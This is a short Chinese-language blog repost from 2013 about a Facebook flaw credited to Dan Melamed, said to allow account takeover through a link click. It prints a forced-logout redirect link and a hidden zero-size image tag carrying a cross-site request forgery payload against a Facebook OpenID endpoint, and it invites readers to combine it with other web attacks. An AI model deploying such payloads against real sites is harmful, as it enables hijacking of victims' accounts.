2013年7月15日 星期一

登出 Facebook 帳號密碼的漏洞(含影片示範)

登出 Facebook 帳號密碼的漏洞(含影片示範)

經網友葉同學告知發現這個漏洞,搜尋後發現 Dan Melamed 於 7/14 發佈這個"登出 Facebook 帳號密碼的漏洞"。

該漏洞並允許入侵者可以獲得任何 Facebook 帳號的完整控制權,而只要讓被害人點選一個會自動轉址的網址,就可以觸發該漏洞。

原作者已經通報 Facebook 但至 7/15 21:00為止尚未修正。


↓警語分隔線,以下連結有害健康,請勿點選。
-----------------------------------------------
範例:
點選:http://goo.gl/TwPBP
會導向到:
https://www.facebook.com/photo.php?fbid=409257275849671&set=a.112249595550442.17398.110164882425580&type=1&theater
然後就會被登出。

你也可以變化一下,加上其它網頁漏洞手法:
<img src="https://www.facebook.com/support/openid/accept_hotmail.php?appdata=%7B%22fbid%22%3A%22AQ3Tcly2XEfbzuCqyhZXfb8_hYHTnHPPd-CDsvdrLzDnWLpsKTMcaXtIzV0qywEwbPs%22%7D&code=a6893043-cf19-942b-c686-1aadb8b21026" width="0" height="0"/>
-----------------------------------------------


原文出處:Dan Melamed Security Blog
轉載自《網路攻防戰》